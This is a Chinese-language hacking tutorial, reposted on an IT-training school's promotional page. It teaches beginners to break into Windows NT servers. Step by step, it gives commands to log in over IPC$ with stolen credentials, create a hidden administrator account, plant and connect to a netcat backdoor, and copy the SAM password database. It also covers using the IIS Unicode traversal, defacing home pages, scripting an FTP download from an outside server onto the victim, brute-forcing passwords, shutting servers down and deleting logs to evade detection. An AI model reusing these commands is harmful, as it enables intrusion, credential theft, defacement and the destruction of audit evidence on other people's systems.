菜鳥必練入侵命令

不僅僅統(tǒng)招學(xué)歷喲

熱門專業(yè)！
大學(xué)校園！
就業(yè)保障！
拿學(xué)歷又能高薪就業(yè)，誰能不愛！

了解詳情>

鄭州北大青鳥翔天信鴿參加“安心學(xué)習(xí)·放心就業(yè)”公約簽約儀式

讓每一個家庭“安心”、“放心”

教學(xué)為本
師愛為魂
安心學(xué)習(xí)
放心就業(yè)

了解詳情>

深耕細作IT職業(yè)教育15載

青鳥之星教學(xué)質(zhì)量大獎
卓越風(fēng)云人物
北大青鳥中心理事會成員
七項榮耀載譽而行！

了解詳情>

我們教學(xué)怎么樣

實力見證
網(wǎng)絡(luò)組一等獎
網(wǎng)絡(luò)組二等獎
軟件組四等獎
200家校區(qū)脫穎而出！

了解更多>

北大青鳥職業(yè)IT20周年

重承諾
守信用
放心品牌
放心學(xué)習(xí)
靠靠譜譜好就業(yè)！

了解更多>

我命由我不由天

學(xué)個性的技術(shù)
做愛做的事
掙滿意的錢
衣食無憂
選擇寬且高大尚！

了解更多>

我們靠不靠譜

14年辦學(xué)
14年磨練
14年成長
14年探索
只為讓每個學(xué)員成材！

了解更多>

不打工也牛掰

好工作
好環(huán)境
高薪資
好課程
支持你成為有“錢”人！

了解更多>

學(xué)IT就讀北大青鳥

好工作
好未來
好老師
好課程
支持你成為受人尊敬的人！

作者：北大青鳥添加時間：12-18 瀏覽次數(shù)：0

1：NET

只要你擁有某IP的用戶名和密碼，那就用IPC$做連接吧！

這里我們假如你得到的用戶是hbx，密碼是123456。假設(shè)對方IP為127.0.0.1

net use \\127.0.0.1\ipc$ "123456" /user:"hbx"

退出的命令是

net use \\127.0.0.1\ipc$ /delte

下面的操作你必須登陸后才可以用.登陸的方法就在上面.

----------------------

下面我們講怎么創(chuàng)建一個用戶，由于SA的權(quán)限相當(dāng)于系統(tǒng)的超級用戶.

我們加一個heibai的用戶密碼為lovechina

net user heibai lovechina /add

只要顯示命令成功，那么我們可以把他加入Administrator組了.

net localgroup Administrators heibai /add

----------------------

這里是講映射對方的C盤，當(dāng)然其他盤也可以，只要存在就行了.我們這里把對方的C盤映射到本地的Z盤.

net use z:\\127.0.0.1\c$

----------------------

net start telnet

這樣可以打開對方的TELNET服務(wù).

----------------------

這里是將Guest用戶激活，guest是NT的默認用戶，而且無法刪除呢？不知道是否這樣，我的2000就是刪除不了它。

net user guest /active:yes

----------------------

這里是把一個用戶的密碼改掉，我們把guest的密碼改為lovechina，其他用戶也可以的。只要有權(quán)限就行了呀！

net user guest lovechina

net命令果然強大�。�

2:at

一般一個入侵者入侵后都會留下后門，也就是種木馬了，你把木馬傳了上去，怎么啟動他呢？

那么需要用AT命令，這里假設(shè)你已經(jīng)登陸了那個服務(wù)器。

你首先要得到對方的時間，

net time \\127.0.0.1

將會返回一個時間，這里假設(shè)時間為12:1，現(xiàn)在需要新建一個作業(yè)，其ID=1

at \\127.0.0.1 12:3 nc.exe

這里假設(shè)了一個木馬，名為NC.EXE，這個東西要在對方服務(wù)器上.

這里介紹一下NC，NC是NETCAT的簡稱，為了方便輸入，一般會被改名.它是一個TELNET服務(wù)，端口為99.

等到了12:3就可以連接到對方的99端口.這樣就給對方種下了木馬.

3:telnet

這個命令非常實用，它可以與遠方做連接，不過正常下需要密碼、用戶，不過你給對方種了木馬，直接連到這個木馬打開的端口.

telnet 127.0.0.1 99

這樣就可以連到對方的99端口.那你就可以在對方運行命令了，這個也就是肉雞.

4:FTP

它可以將你的東西傳到對方機子上，你可以去申請個支持FTP上傳的空間，國內(nèi)多的是，如果真的找不到，我給個，不錯的.當(dāng)我們申請完后，它會給用戶名，密碼，以及FTP服務(wù)器.

在上傳前需要登陸先，這里我們假設(shè)FTP服務(wù)器是http://，用戶名是HUCJS，密碼是654321

ftp http://

他會要求輸入用戶，成功后會要求輸入密碼.

下面先說上傳，假設(shè)你需上傳的文件是INDEX.HTM，它位于C:\下，傳到對方D:\

get c:\index.htm d:\

假設(shè)你要把對方C盤下的INDEX.HTM，下到你的機子的D盤下

put c:\index.htm d:\

5:copy

下面我說說怎樣把本地的文件復(fù)制到對方硬盤上去，需要建立好IPC$連接才有效。

這里我們把本地C盤下的index.htm復(fù)制到127.0.0.1的C盤下

copy index.htm \\127.0.0.1\c$\index.htm

----------------------

如果你要復(fù)制到D盤下把C改為D，就行了！

copy index.htm \\127.0.0.1\d$\index.htm

----------------------

如果你要把他復(fù)制到WINNT目錄里

就要把輸入

copy index.htm \\127.0.0.1\admin$\index.htm

admin$是winnt

----------------------

要把對方的文件復(fù)制過來，順便告訴大家NT的備份的數(shù)據(jù)庫放在x:\winnt\repair\sam._ sam._是數(shù)據(jù)庫的文件名

下面就把127.0.0.1的數(shù)據(jù)庫復(fù)制到本地C盤下

copy \\127.0.0.1\admin$\repair\sam._ c:\

----------------------

6：set

如果你跑進了一部機子，而且想黑他（這思想只能在特別時候才準(zhǔn)有），當(dāng)然他的80端口要開，不然你黑給誰看。這時需要用SET命令！

下面是我得到的結(jié)果！我來分析它，只是找主頁在那而已。

COMPUTERNAME=PENTIUMII
ComSpec=D:\WINNT\system32\cmd.exe
CONTENT_LENGTH=0
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=*/*
HTTP_ACCEPT_LANGUAGE=zh-cn
HTTP_CONNECTION=Keep-Alive
HTTP_HOST=當(dāng)前登陸者的IP，這里本來是顯示我的IP，被我刪除了
HTTP_ACCEPT_ENCODING=gzip， deflate
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
NUMBER_OF_PROCESSORS=1
Os2LibPath=D:\WINNT\system32\os2\dll;
OS=Windows_NT
Path=D:\WINNT\system32;D:\WINNT
PATHEXT=.COM;.EXE;.BAT;.CMD
PATH_TRANSLATED=E:\vlroot主頁放在的地址，只要你看到PATH_TRANSLATED=的后面就是主頁的存放地址。這里是E:\vlroot
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Family 6 Model 3 Stepping 3， GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=0303
PROMPT=$P$G
QUERY_STRING=/c+set
REMOTE_ADDR=XX.XX.XX.XX
REMOTE_HOST=XX.XX.XX.XX
REQUEST_METHOD=GET
script_NAME=/scripts/..%2f../winnt/system32/cmd.exe
SERVER_NAME=XX.XX.XX.XX
SERVER_PORT=80
SERVER_PORT_SECURE=0
SERVER_PROTOCOL=HTTP/1.1
SERVER_SOFTWARE=Microsoft-IIS/3.0對方使用IIS/3.0
SystemDrive=D:
SystemRoot=D:\WINNT
TZ=GMT-9
USERPROFILE=D:\WINNT\Profiles\Default User
windir=D:\WINNT

粉紅色的那行就是對方主頁存放地址，這里告訴大家一個技巧，很笨的技巧啊，不過只能用這個方法才能100%的找到主頁的名稱，當(dāng)你DIR這個目錄時，一定會看到很多文件，你可以把所有文件在瀏覽器這樣輸入XX.XX.XX.XX/文件名，這樣只要看到和XX.XX.XX.XX看到的也面一模一樣，那么這就是主頁的名稱了。

7：nbtstat

如果你掃到一部NT的機子，他的136到139其中一個端口開了的話，就要用這個命令得到用戶了。順便告訴大家這是netbios，得到用戶名后就可以猜猜密碼了。例如比較簡單的密碼，密碼和用戶名一樣的，都試下，不行就暴力破解吧！

現(xiàn)在網(wǎng)上很多NT的機子都開了這些端口的，你可以練習(xí)下，我們來分析得到的結(jié)果。

命令是

nbtstat -A XX.XX.XX.XX

-A一定要大寫哦。

下面是得到的結(jié)果。

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
Registered Registered Registered Registered Registered Registered Registered Reg
istered Registered Registered Registered
MAC Address = 00-E0-29-14-35-BA
PENTIUMII <00> UNIQUE
PENTIUMII <20> UNIQUE
ORAHOTOWN <00> GROUP
ORAHOTOWN <1C> GROUP
ORAHOTOWN <1B> UNIQUE
PENTIUMII <03> UNIQUE
INet~Services <1C> GROUP
IS~PENTIUMII...<00> UNIQUE
ORAHOTOWN <1E> GROUP
ORAHOTOWN <1D> UNIQUE
..__MSBROWSE__.<01> GROUP

粉紅色的就是登陸過這部系統(tǒng)的用戶，可能你不知道怎么看，大家是不是看到了一竄數(shù)字，只要這竄數(shù)字是<03>的話，那他前面的就是用戶。

這里的用戶是PENTIUMII。

8：Shutdown

關(guān)了對方的NT服務(wù)器的命令

Shutdown \\IP地址 t:20

20秒后將NT自動關(guān)閉，三思后才能運行這個命令，這樣對對方造很大的損失，要做個有良心的入侵者呀。

9：DIR

這個命令沒什么好講，但是卻非常重要，他是查看一目錄里的所有文件、文件夾。

你可以本地試下。

10：echo

著名的漏洞Unicode，這個命令可以簡單的黑一下有這個漏洞的主機。

我們假設(shè)我們要把“南京大屠殺鐵證如山，任何日本人不得抵賴！”寫入index.htm，有2種方法，大家看看有什么區(qū)別。

echo 南京大屠殺鐵證如山，任何日本人不得抵賴！>index.htm

echo 南京大屠殺鐵證如山，任何日本人不得抵賴！>>index.htm

第一個的意思是覆蓋index.htm原有的內(nèi)容，把“南京大屠殺鐵證如山，任何日本人不得抵賴！”寫進index.htm。

第二個的意思是把“南京大屠殺鐵證如山，任何日本人不得抵賴！”加到index.htm里面。

“>>”產(chǎn)生的內(nèi)容將追加進文件中，“>”則將原文件內(nèi)容覆蓋。

大家可以本地試下。

可能你會問，這樣簡單黑下有什么好玩的，其實他可以用來下載主頁到對方的目錄里。

1、首先，我們需要申請一個免費的主頁空間。

2、用echo在可寫目錄下建立如下內(nèi)容的txt文件：（以chinren服務(wù)器為例。）
open upload.chinaren.com（你的FTP服務(wù)器，申請時你的空間提供商會給你的）
cnhack（你申請時的用戶名）
test（你申請時的密碼）
get index.htm c:\inetpub\wwwroot\index.htm（這里是把你空間上的index.htm下載到對方的c:\inetpub\wwwroot\index.htm）
bye（退出FTP對話，相當(dāng)在98下的DOS，用EXIT退出DOS）

具體的做法：
輸入 echo open upload.chinaren.com> c:\cnhack.txt
輸入 echo cnhack >> c:\cnhack.txt
輸入 echo 39abs >> c:\cnhack.txt
輸入 echo get index.htm c:\inetpub\wwwroot\index.htm+>>+c:\cnhack.txt
最后輸入 ftp -s:c:\cnhack.txt （利用ftp的-s參數(shù)，執(zhí)行文件里的內(nèi)容。）

等命令完成時，文件已經(jīng)下載到你指定的文件里了。

注意：取得文件后，請刪除cnhack.txt。（如果不刪除，很容易會給別人看到你的密碼。）

記得要 del c:\cnhack.txt

11:attrib

這個命令是設(shè)置文件屬性的。如果你想黑一個站，而他的主頁的文件屬性設(shè)置了只讀，那就很可憐呀，想刪除他也不行，想覆蓋他也不行。倒！不過有這個命令就別怕了。

attrib -r index.htm

這個命令是把index.htm的只讀屬性去掉。

如果把“-”改為“+”則是把這個文件的屬性設(shè)置為只讀

----------------------

attrib +r index.htm

這個命令是把index.htm的屬性設(shè)置為只讀。

12:del

當(dāng)你看到這個標(biāo)題可別倒下��！現(xiàn)在要離開127.0.0.1了，要刪除日志，當(dāng)然要刪除日志啦！想被捉嗎。呵呵。

NT的日志有這些

del C:\winnt\system32\logfiles\*.*
del C:\winnt\ssytem32\config\*.evt
del C:\winnt\system32\dtclog\*.*
del C:\winnt\system32\*.log
del C:\winnt\system32\*.txt
del C:\winnt\*.txt
del C:\winnt\*.log

只要刪除這些就可以了。有些系統(tǒng)NT安裝在D盤或其他盤，就要把C改成其他盤。

文章由鄭州北大青鳥整理，轉(zhuǎn)載請注明：http://

本文由站河南北大青鳥校區(qū)整編而成，如需了解更多IT資訊類的文章、新聞、課程和學(xué)習(xí)技巧、就業(yè)案例、招生詳情等問題，可以對在線咨詢老師進行一對一問答！